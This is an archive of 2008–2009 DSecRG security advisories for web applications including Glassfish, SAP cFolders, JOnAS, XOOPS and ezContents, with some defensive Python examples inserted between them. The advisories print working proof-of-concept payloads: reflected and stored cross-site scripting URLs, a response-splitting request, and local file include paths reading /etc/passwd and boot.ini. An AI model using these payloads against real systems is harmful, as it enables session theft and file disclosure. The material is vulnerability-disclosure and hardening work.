[DSECRG-09-034] Sun Glassfish Enterprise Server - Multiple Linked XSS vulnerabilities

2009-05-05 Thread Digital Security Research Group [DSecRG]
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-034

Original advisory: http://dsecrg.com/pages/vul/show.php?id=134

Application:            Sun Glassfish Enterprise Server
Versions Affected:      2.1
Vendor URL:             https://glassfish.dev.java.net/
Bug:                    Multiple Linked XSS vulnerabilities
Exploits:               YES
Reported:               19.03.2009
Vendor response:        20.03.2009
Solution:               YES
Date of Public Advisory:05.05.2009
Author:                 Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)



Description
***

Glassfish Enterprise Server Admin Console has multiple linked XSS 
vulnerabilities.



Details
***

Using this vulnerability an attacker can steal the administrator's cookie and then 
authenticate as administrator or perform certain administrative actions.

1. Multiple Linked XSS vulnerabilities.

Many pages have a typical reflected XSS vulnerability: the request URL is echoed 
into an inline script on the page, so an attacker can inject script through the 
URL string.

Example:

http://[server]/applications/applications.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/configuration/configuration.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/customMBeans/customMBeans.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/resourceNode/resources.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/sysnet/registration.jsf?');};alert(DSecRG_XSS);</script><!--
http://[server]/webService/webServicesGeneral.jsf?');};alert(DSecRG_XSS);</script><!--

Response HTML Code:
---
#

...
<script type="text/javascript">
var myonload = new Object();
myonload.oldonload = window.onload;
myonload.newonload = function() {
if ('/applications/applications.jsf?');};alert(DSecRG_XSS);</script><!--' != '') 
{
...

#


2. Multiple Linked XSS vulnerabilities in the GET parameter name.

Many pages reflect the GET parameter name into the page without encoding.

An attacker can inject XSS through the URL string.

Example:

http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>
http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>&configName=server-config
http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert('DSecRG_XSS')>



Solution


These security vulnerabilities are fixed in CVS.

The following links point to the commit e-mail messages for all the changes that 
fix these issues:

https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsg&msgNo=29669
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsg&msgNo=29668
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsg&msgNo=29675



Credits
***

http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html



About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems, with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsecrg [dot] com
http://www.dsecrg.com 
http://www.dsec.ru




[DSECRG-09-038] Sun Glassfish Woodstock Project - Linked XSS Vulnerability

2009-05-05 Thread Digital Security Research Group [DSecRG]
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-038

Original advisory: http://dsecrg.com/pages/vul/show.php?id=138

Application:            Sun Glassfish Woodstock Project (part of Glassfish Enterprise Server)
Versions Affected:      4.2
Vendor URL:             https://woodstock.dev.java.net/
Bug:                    Linked XSS Vulnerability
Exploits:               YES
Reported:               19.03.2009
Vendor response:        20.03.2009
Solution:               YES
Date of Public Advisory:05.05.2009
Author:                 Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)



Description
***

Woodstock components are user interface components for the web, based on 
JavaServer Faces and AJAX.

Woodstock is also part of Glassfish Enterprise Server.

Woodstock has a linked XSS vulnerability in its 404 error page.



Details
***

Using this vulnerability an attacker can steal the administrator's cookie and then 
authenticate as administrator or perform certain administrative actions.

An attacker can inject XSS through the URL string using UTF-7 encoding.

Exploiting this issue requires the browser's character encoding to be set to 
Auto-Select.

Example:

http://[server]/theme/META-INF/+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7-
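As an added example (not code from Glassfish, Woodstock or the advisories), the Python below shows the output-side fixes these two Glassfish advisories call for: a JavaScript string-literal encoder for the onload pattern visible in the response HTML of DSECRG-09-034, HTML escaping for the reflected name parameter, and an explicit charset on every HTML response, which is what takes a browser on Auto-Select encoding out of the sniffing that the UTF-7 404-page issue depends on. The page layout and function names are assumptions.

```python
import html
import json

# Constructed sample inputs, not captured from a live system: the two payload
# shapes the Glassfish advisory shows, for a JavaScript-string context and an
# HTML-body context respectively.
JS_CONTEXT_PAYLOAD = "');};alert(DSecRG_XSS);</script><!--"
HTML_CONTEXT_PAYLOAD = "<IMG SRC=javascript:alert('DSecRG_XSS')>"


def vulnerable_onload_script(request_uri: str) -> str:
    """Reproduces the vulnerable pattern from the advisory's response HTML:
    the request URI is pasted verbatim into a JavaScript string literal."""
    return (
        '<script type="text/javascript">\n'
        "var myonload = new Object();\n"
        "myonload.oldonload = window.onload;\n"
        "myonload.newonload = function() {\n"
        f"  if ('{request_uri}' != '') {{\n"
        "    /* ... */\n"
        "  }\n"
        "};\n"
    )


def js_string_literal(value: str) -> str:
    """Encode a value for use inside a JavaScript string literal.

    json.dumps yields a double-quoted literal with backslash escapes for quotes,
    backslashes and control characters. On top of that, '<', '>' and '&' are
    written as \\uXXXX escapes so that the sequence </script> (or any other
    tag) can never appear in the page source, whatever the value contains.
    """
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def hardened_onload_script(request_uri: str) -> str:
    """Same script as above, but the URI goes through js_string_literal()."""
    return (
        '<script type="text/javascript">\n'
        "var myonload = new Object();\n"
        "myonload.oldonload = window.onload;\n"
        "myonload.newonload = function() {\n"
        f"  if ({js_string_literal(request_uri)} != '') {{\n"
        "    /* ... */\n"
        "  }\n"
        "};\n"
    )


def render_name_cell(name: str) -> str:
    """HTML-body context (the `name` GET parameter of the *Edit.jsf pages):
    html.escape() with quote=True turns < > & " ' into character references,
    so the value is displayed as text and never parsed as markup."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


def html_content_type() -> str:
    """Declare the charset explicitly on every HTML response, error pages such
    as the 404 page included. Browsers that auto-detect the encoding only do so
    for responses that do not declare one, so this removes the UTF-7 path."""
    return "text/html; charset=UTF-8"


def script_closed_early(page_source: str) -> bool:
    """Check helper: True if a closing script tag appears before the function
    body, i.e. the injected value broke out of the string literal."""
    body_end = page_source.find("/* ... */")
    return "</script>" in page_source[:body_end].lower()
```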



Solution


This security vulnerability is fixed in CVS.

The following link points to the commit e-mail message for the changes that fix 
this issue:

https://woodstock.dev.java.net/servlets/ReadMsg?list=cvsmsg&msgNo=4041



Credits
***

http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html





SAP Cfolders Multiple Linked XSS Vulnerabilities

2009-04-22 Thread Digital Security Research Group [DSecRG]
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-021

Original advisory: http://dsecrg.com/pages/vul/show.php?id=121

Application:            SAP Cfolders (SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms))
Vendor URL:             http://SAP.com
Bugs:                   Multiple Linked XSS
Risk:                   High
Exploits:               YES
Reported:               12.01.2009
Vendor response:        13.01.2009
Patched:                21.01.2009
Date of Public Advisory:21.04.2009
Reference:              SAP note 1292875
Author:                 Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

cFolders (Collaboration Folders) is the SAP web-based application for 
collaborative sharing of information. cFolders is part of a suite of applications 
powered by SAP® NetWeaver™ that integrate project management, knowledge management 
and resource management in collaborative inter-enterprise and intra-enterprise 
environments.

cFolders is integrated with SAP ECC, SAP Product Lifecycle Management (PLM), SAP 
Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver™ 
cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for 
changes, and redline documents and product information. Partners and suppliers can 
interact with cFolders in predefined collaborative or competitive scenarios.



Details
***

Multiple Linked XSS vulnerabilities were found in the SAP Cfolders engine. Any user 
can create a vulnerable link and steal a user's or administrator's cookie.

This can be done using 3 Linked XSS vulnerabilities.


1. Linked XSS found in the col_table_filter.htm page. Vulnerable parameter: 
p_current_role

Example: 
https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=<IMG/SRC=JaVaScRiPt:alert('DSECRG')>


2. Linked XSS found in the me_ov.htm page. Vulnerable parameter: p_current_role


Example: 
https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role=<IMG/SRC=JaVaScRiPt:alert('DSECRG')>



Fix Information
***

The issue has been solved. See SAP note 1292875.



References:
***

SAP note 1292875 

https://service.sap.com/sap/support/notes/1292875 






SAP Cfolders Multiple Stored XSS Vulnerabilities

2009-04-22 Thread Digital Security Research Group [DSecRG]
Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-014

Original advisory: http://dsecrg.com/pages/vul/show.php?id=114

Application:            SAP Cfolders (included in: SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms)
Vendor URL:             http://SAP.com
Bugs:                   Multiple Stored XSS
Risk:                   High
Exploits:               YES
Reported:               04.12.2008
Vendor response:        05.12.2008
Vulnerability patched:  15.12.2008
Date of Public Advisory:21.04.2009
Reference:              SAP note 1284360
Author:                 Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***


cFolders (Collaboration Folders) is the SAP web-based application for 
collaborative sharing of information. cFolders is part of a suite of applications 
powered by SAP NetWeaver that integrate project management, knowledge management 
and resource management in collaborative inter-enterprise and intra-enterprise 
environments.

cFolders is integrated with SAP ECC, SAP Product Lifecycle Management (PLM), SAP 
Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver 
cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for 
changes, and redline documents and product information. Partners and suppliers can 
interact with cFolders in predefined collaborative or competitive scenarios.



Details
***

Multiple Stored XSS vulnerabilities were found in the SAP Cfolders engine. A user who 
is a business partner of the organization can steal the administrator's cookie by 
inserting JavaScript into the cFolders system. This can be done using 2 Stored XSS 
vulnerabilities.

The SAP server does not associate session identifiers with the user's IP address or 
with any other additional data. It authenticates users only by cookies, so any user 
who can steal the administrator's cookie can use it to authenticate with 
administrator rights.


1. A user can insert JavaScript code into the site using the link creation option.

JavaScript code can be injected into the LINK field on the page

https://[site]/sap/bc/bsp/sap/cfx_rfc_ui/hyp_de_create.htm


Example LINK value:

http://test.com; onmouseover=alert(document.cookie)

When the administrator then browses the user's folders, the script executes.


2. The second XSS vulnerability was found in the document uploading area.
A user can create a document whose file name includes JavaScript code.


Example filename value:

<script>alert()</script>.doc

To do this the user must change the file name in the HTTP request when sending the 
file upload request.

Using this vulnerability the user can steal the cookie as in the first example.



Fix Information
***

The issue has been solved. See SAP note 1284360.


References:
***

SAP note 1284360

https://service.sap.com/sap/support/notes/1284360






[DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability

2009-02-26 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-009
--link to original advisory --
http://www.dsecrg.com/pages/vul/show.php?id=82


Application:            APC PowerChute Network Shutdown's Web Interface
Vendor URL:             http://www.apc.com/
Bug:                    XSS/Response Splitting
Exploits:               YES
Reported:               20.10.2008
Vendor Response:        20.10.2008
Vendor Reference:       081020-000796
Solution:               Use Firewall
Date of Public Advisory:26.02.2009
Author:                 Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

Linked XSS and Response Splitting vulnerabilities were found in the APC PowerChute 
Network Shutdown web interface.


Details
***

1. Linked XSS vulnerability found in script /security/applet; vulnerable 
parameter: referrer


Example
***

GET /security/applet?referrer='<img/src=javascript:alert('DSECRG_XSS')>


2. Response Splitting vulnerability found in script contexthelp; vulnerable 
parameter: page


Example
***

GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0

response:

HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html
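As an added example, not code from PowerChute or the advisory, the Python below builds the 302 redirect two ways: concatenating the decoded page value into Location, which is what the response above shows, and percent-encoding the value and refusing any CR/LF before the header is emitted. A small header parser shows the injected DSECRG_HEADER surfacing as a header only in the first case. The header layout is assumed from the response shown.

```python
import re
from urllib.parse import quote

CRLF = "\r\n"

# Constructed value: the advisory's page parameter after URL decoding
# (%0d%0a is a bare CRLF once the server has decoded the query string).
INJECTED_PAGE = "Foobar?\r\nDSECRG_HEADER:testvalue"


def vulnerable_redirect(page: str) -> str:
    """Builds the redirect the way the advisory's response shows it: the
    decoded parameter is concatenated straight into the Location header."""
    lines = [
        "HTTP/1.0 302 Moved temporarily",
        "Content-Length: 0",
        "Location: help/english/" + page,
        "Content-type: text/html",
    ]
    return CRLF.join(lines) + CRLF + CRLF


def parse_response_headers(raw: str) -> dict:
    """Splits a raw response the way a client does: everything before the first
    blank line is headers, one per CRLF-terminated line. A CRLF injected into a
    header value therefore shows up as an extra header chosen by the attacker."""
    head = raw.split(CRLF + CRLF, 1)[0]
    headers = {}
    for line in head.split(CRLF)[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def checked_header_value(value: str) -> str:
    """Refuse, rather than strip, CR, LF and NUL in any header value. Stripping
    is fragile because the value may be decoded again downstream; rejecting
    leaves no way for a second header line to be formed."""
    if re.search(r"[\r\n\x00]", value):
        raise ValueError("control character in header value")
    return value


def hardened_redirect(page: str) -> str:
    """Percent-encodes the user-controlled segment (safe='' also encodes '/',
    '?' and ':', so it stays a single segment under help/english/), then passes
    the whole value through checked_header_value() as a last line of defence."""
    target = "help/english/" + quote(page, safe="")
    lines = [
        "HTTP/1.0 302 Moved temporarily",
        "Content-Length: 0",
        "Location: " + checked_header_value(target),
        "Content-type: text/html",
    ]
    return CRLF.join(lines) + CRLF + CRLF


def header_value_rejected(value: str) -> bool:
    """Check helper: True if checked_header_value() refuses the value."""
    try:
        checked_header_value(value)
    except ValueError:
        return True
    return False
```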



Solution


http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539


A low-risk web interface vulnerability has been discovered in the PowerChute 
Business Edition  Shutdown Agent.
This issue is scheduled to be addressed in a release of the application.
While the severity of this vulnerability has been determined to be minimal,
it is recommended that users continue to ensure the highest level of 
protection possible through the placement of PowerChute Business Edition behind 
a firewall.


References
**

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539






[DSECRG-09-008] JOnAS(4.10.3) - Linked XSS Vulnerability

2009-02-25 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-008
--link to original advisory --
http://www.dsecrg.com/pages/vul/show.php?id=81




Application:            JOnAS (Java Open Application Server)
Versions Affected:      JOnAS(4.10.3) / Apache Tomcat (5.5.26)
Vendor URL:             http://wiki.jonas.objectweb.org/
Bugs:                   Linked XSS
Exploits:               YES
Reported:               21.01.2009
Vendor response:        NONE
Second Reported:        29.01.2009
Vendor response:        NONE
Date of Public Advisory:25.02.2009
Author:                 Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

JOnAS is a leading-edge open source implementation by OW2 of the Java EE 
specification.


A Linked XSS vulnerability was found in the JOnAS engine.
Using this vulnerability an attacker can steal the administrator's cookie and then 
authenticate as administrator or perform certain administrative actions.


Details
***

A Linked XSS vulnerability was found in script ListMBeanDetails.do; vulnerable 
parameter: select.

In the normal case the select parameter looks like this:

select=jonas:j2eeType=EJBModule


When we try to include another variable with the same name, for example like 
this:


select=jonas:j2eeType=EJBModule,j2eeType=EJBModule


we get an error page telling us that the j2eeType variable is already defined.
When we include JavaScript code in the variable name, it appears in the error page 
unencoded:

select=jonas:j2eeType<script>alert()</script>=EJBModule,j2eeType<script>alert()</script>=EJBModule


Example
***


http://localhost:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule%2Cj2eeType<script>alert('DSecRG%20XSS')</script>%3DEJBModule


Fix Information
***

No patches available.
We did not get any response from the vendor for more than 2 weeks.














Digital Security Research Group
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: resea...@dsecrg.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, 
copying or disclosure 
is strictly prohibited. If you have received this message in error, please 
notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment 
from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor 
accepts legally binding 
statements by e-mail unless otherwise agreed. 
---  



[DSECRG-09-004] AXIS 70U Network Document Server - Privilege Escalation and XSS

2009-01-21 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-09-004
AXIS 70U Network Document Server - Privilege Escalation and XSS

http://dsecrg.com/pages/vul/show.php?id=60


Application:            AXIS 70U Network Document Server (Web Interface)
Versions Affected:      3.0
Vendor URL:             http://www.axis.com/
Bug:                    Local File Include and Privilege Escalation, Multiple Linked XSS
Exploits:               YES
Reported:               20.10.2008
Vendor response:        20.10.2008
Last response:          02.01.2009
Vendor Case ID:         143027
Solution:               NONE
Date of Public Advisory:19.01.2009
Authors:                Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

Vulnerabilities were found in the web interface of the AXIS 70U Network Document 
Server device.

1. Local File Include and Privilege Escalation.

A standard user can escalate privileges to administrator.

2. Multiple Linked XSS vulnerabilities



Details
***

1. Local File Include and Privilege Escalation.

A Local File Include vulnerability was found in script user/help/help.shtml.

A user can include any local file, even from the admin folder.

Example:

http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml


2. Multiple Linked XSS vulnerabilities

Linked XSS vulnerabilities were found in scripts:

user/help/help.shtml
user/help/general_help_user.shtml

An attacker can inject script through the URL.

Example:

http://[server]/user/help/help.shtml?<script>alert('DSecRG XSS')</script>
http://[server]/user/help/general_help_user.shtml?<script>alert('DSecRG XSS')</script>



Solution


The vendor decided that this vulnerability is not critical and that there are no 
patches for this firmware, but may fix the issues in the next firmware release.


Vendor response:

[13.01.2009]: We don't see any major vulnerability issues with the current 
firmware of Axis 70U but we will consider the mentioned issues on the next 
firmware release.








Digital Security opens a site of its research center DSec Research Group

2009-01-21 Thread Digital Security Research Group
Digital Security opens a site of its research center DSec Research Group

Digital Security opens a site of its research center DSec Research
Group [DSecRG], whose main mission is to conduct research on different 
application and system vulnerabilities.
The results of this work are then used by the experts of the Digital Security 
audit department for assessing the security level of information systems with 
the use of active audit methods and also while carrying out penetration tests.

Data about the vulnerabilities found by DSecRG experts is published in the 
SecurityFocus mailing lists and on the Milw0rm.com portal, and is now also 
available at the DSecRG website ( www.dsecrg.com ) in the form of advisories 
and whitepapers.












[DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x

2008-12-08 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-040


Application:            XOOPS
Versions Affected:      2.3.1
Vendor URL:             http://www.xoops.org/
Bug:                    Multiple Local File Include
Exploits:               YES
Reported:               10.11.2008
Vendor response:        10.11.2008
Solution:               YES
Date of Public Advisory:08.12.2008
Authors:                Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

XOOPS has Multiple Local File Include vulnerabilities.



Details
***

Local File Include vulnerabilities were found in scripts:

xoops_lib/modules/protector/blocks.php
xoops_lib/modules/protector/main.php

Successful exploitation requires that register_globals is enabled.

Code

#

$mytrustdirname = basename( dirname( __FILE__ ) ) ;
$mytrustdirpath = dirname( __FILE__ ) ;

// language files
$language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ;
if( file_exists( "$mydirpath/language/$language/main.php" ) ) {
    // user customized language file (already read by common.php)
    // include_once "$mydirpath/language/$language/main.php" ;
} else if( file_exists( "$mytrustdirpath/language/$language/main.php" ) ) {
    // default language file
    include_once "$mytrustdirpath/language/$language/main.php" ;
...

#

For successful exploitation the first condition of the if..else statement must be 
false; with register_globals enabled, $mydirpath can be set from the request to a 
directory that does not exist, as in the example below.

Example:

http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00
http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRG&xoopsConfig[language]=../../../../../../../boot.ini%00



Solution


The vendor fixed this flaw on 26.11.2008.

The XOOPS 2.3.2a Security Release can be downloaded from the Sourceforge repository:

https://sourceforge.net/project/showfiles.php?group_id=41586&package_id=153583&release_id=643010

Release notes:

http://www.xoops.org/modules/news/article.php?storyid=4540








[DSECRG-08-039] Local File Include Vulnerability in Pluck CMS 4.5.3

2008-11-18 Thread Digital Security Research Group
Hello, bugtraq.

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-039


Application:            Pluck CMS
Versions Affected:      4.5.3
Vendor URL:             http://www.pluck-cms.org/
Bug:                    Local File Include
Exploits:               YES
Reported:               25.08.2008
Vendor Response:        30.08.2008
Solution:               YES
Date of Public Advisory:18.11.2008
Author:                 Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

Pluck CMS has Local File Include vulnerability. 



Details
***

1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php

Successful exploitation requires that register_globals is enabled.

Code

#

  if (!isset($g_pcltar_lib_dir))
    $g_pcltar_lib_dir = "lib";

...

  $g_pcltar_extension = "php";

  if (!defined("PCLERROR_LIB"))
  {
    include("data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension");
  }
  if (!defined("PCLTRACE_LIB"))
  {
    include("data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension");
  }

#

Example:

http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00



Solution

The vendor fixed this flaw on 09.08.2008. The new version, Pluck CMS 4.6, can be 
downloaded here:


http://www.pluck-cms.org/downloads/click.php?id=8







[DSECRG-08-038] Multiple Local File Include Vulnerabilities in ezContents CMS 2.0.3

2008-08-25 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-038


Application:            ezContents CMS
Versions Affected:      2.0.3
Application URL:        http://www.ezcontents.org/
Vendor URL:             http://www.visualshapers.com/
Bug:                    Multiple Local File Include
Exploits:               YES
Reported:               05.08.2008
Second report:          18.08.2008
Vendor Response:        NONE
Solution:               NONE
Date of Public Advisory:25.08.2008
Author:                 Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

ezContents CMS has Multiple Local File Include vulnerabilities. 



Details
***

1. Local File Include vulnerability found in script /module.php

Vulnerable GET parameter: link.

First discovered by Zero_X [http://secunia.com/advisories/10604/].
The vendor fixed the vulnerability in version 2.0.3 by adding verification for this 
parameter. However, an attacker can still include local files.

Code [line 32-42, 141-145]
--
#

$GLOBALS["rootdp"] = './';
require_once ($GLOBALS["rootdp"]."include/config.php");
require_once ($GLOBALS["rootdp"]."include/db.php");
require_once ($GLOBALS["rootdp"]."include/session.php");
include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");


if ((!isset($HTTP_GET_VARS["ezSID"])) && (isset($HTTP_POST_VARS["ezSID"]))) $HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"];
if ((!isset($HTTP_GET_VARS["link"])) && (isset($HTTP_POST_VARS["link"])))  $HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];

$HTTP_GET_VARS["link"] = str_replace('../', '', $HTTP_GET_VARS["link"]);

...

if (isExternalLink ($HTTP_GET_VARS["link"])) {
    ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents';
} else {
    include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);
}

#

The isExternalLink() function in script /include/functions.php checks for remote 
inclusion attempts.

Code [line 768-779]
---
#

function isExternalLink ($linkref)
{
    if ( (substr($linkref,0,5) == 'http:')   ||
         (substr($linkref,0,6) == 'https:')  ||
         (substr($linkref,0,5) == 'file:')   ||
         (substr($linkref,0,4) == 'ftp:')    ||
         (substr($linkref,0,7) == 'gopher:') ||
         (substr($linkref,0,7) == 'mailto:') ||
         (substr($linkref,0,5) == 'news:')   ||
         (substr($linkref,0,7) == 'telnet:') ||
         (substr($linkref,0,5) == 'wais:') ) {
        return True;
    } else {
        return False;
    }
} // isExternalLink

#

Example:

http://[server]/[installdir]/module.php?link=//////////////////////////etc/passwd
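As an added example, not code from XOOPS, Pluck, ezContents or Freeway, the Python below models the include pattern these advisories share (an untrusted language value pasted into an include path, with a NUL byte truncating it) next to a hardened resolver that accepts only a bare language name and checks that the resolved path stays under the language directory; it also shows that a single str_replace('../', '', ...) like the one in module.php above leaves absolute paths and NUL bytes untouched. The base directory and language names are assumed.

```python
import os
import re

# Only a plain directory name is a valid language: lowercase letters, no
# separators, no dots. Anything else is refused before a path is even built.
LANGUAGE_NAME = re.compile(r"[a-z]{2,16}")

# Constructed sample values: the parameter values from the advisories'
# examples after URL decoding (%00 becomes a NUL byte).
TRAVERSAL_WITH_NUL = "../../../../../../../boot.ini\x00"
PASSWD_WITH_NUL = "../../../../../../../../../../../../../etc/passwd\x00"
SLASHED_PASSWD = "//////////////////////////etc/passwd"


def vulnerable_include_path(base_dir: str, language: str) -> str:
    """The pattern shared by these advisories: an untrusted value is pasted into
    an include path. Runtimes of that era handed the path to C string APIs, so
    a NUL byte ended the string and the intended suffix (/main.php here) was
    silently dropped; cutting at NUL models that behaviour."""
    path = base_dir + "/language/" + language + "/main.php"
    return path.split("\x00", 1)[0]


def escapes_directory(base_dir: str, path: str) -> bool:
    """True if path, after ../ resolution, lies outside base_dir."""
    root = os.path.normpath(base_dir)
    return os.path.commonpath([root, os.path.normpath(path)]) != root


def strip_dotdot_once(value: str) -> str:
    """The ezContents filter: a single str_replace('../', '', ...). It removes
    the literal sequence but does nothing about absolute paths or NUL bytes,
    so it is not a substitute for validating the value."""
    return value.replace("../", "")


def safe_include_path(base_dir: str, language: str) -> str:
    """Hardened resolution: the value must be a bare language name (so NUL,
    '/', '.' and '..' never reach the filesystem), the path is resolved with
    realpath(), and the result must still be inside the language directory.
    The value is an explicit parameter, never a global that register_globals
    could populate from the request."""
    if not LANGUAGE_NAME.fullmatch(language):
        raise ValueError("invalid language name")
    root = os.path.realpath(os.path.join(base_dir, "language"))
    candidate = os.path.realpath(os.path.join(root, language, "main.php"))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("resolved path leaves the language directory")
    return candidate


def include_rejected(base_dir: str, language: str) -> bool:
    """Check helper: True if safe_include_path() refuses the value."""
    try:
        safe_include_path(base_dir, language)
    except ValueError:
        return True
    return False
```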


2. Local File Include vulnerabilities found in scripts

/modules/diary/showdiary.php
/modules/diary/showeventlist.php
/modules/gallery/showgallery.php
/modules/reviews/showreviews.php

Successful exploitation requires that register_globals is enabled.

Code [showdiary.php, line 32-45]

#

global $HTTP_SERVER_VARS;
if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == 'control.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == 'module.php') ||
     (substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == 'showcontents.php') ) {
    require_once('./modules/moduleSec.php');
} else {
    require_once('../moduleSec.php');
}

$GLOBALS["ModuleName"] = 'diary';

if (!isset($GLOBALS["gsLanguage"])) { Header("Location: ".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"]."/showdiary.php"); }
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");
include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");

#

Script /modules/moduleSec.php checks for inclusion attempts.

Code

#

function moduleExternalLink ($linkref)
{
    if ($linkref != '') {
        if ( (substr($linkref,0,5) == 'http:')   ||
             (substr($linkref,0,6) == 'https:')  ||
             (substr($linkref,0,5) == 'file:')   ||
             (substr($linkref,0,4) == 'ftp:')    ||
             (substr($linkref,0,7) == 'gopher:') ||
             (substr($linkref,0,7) == 'mailto:') ||
             (substr($linkref,0,5) == 'news:')   ||
             (substr($linkref,0,7) == 'telnet:') ||
             (substr($linkref,0,5) == 'wais:') ) {
            return True;
        } else {
            return False;
        }
    } else

[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

2008-08-18 Thread Digital Security Research Group [DSecRG]

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-036


Application:            Freeway eCommerce
Versions Affected:      1.4.1.171
Vendor URL:             http://www.openfreeway.org/
Bugs:                   RFI, Multiple LFI, XSS
Exploits:               YES
Reported:               27.06.2008
Second report:          04.07.2008
Vendor response:        06.07.2008
Solution:               YES
Date of Public Advisory:18.08.2008
Author:                 Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***

Freeway eCommerce system has multiple security vulnerabilities:

1. Multiple Remote/Local File Include
2. Linked XSS vulnerability 


Details
***

1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities.

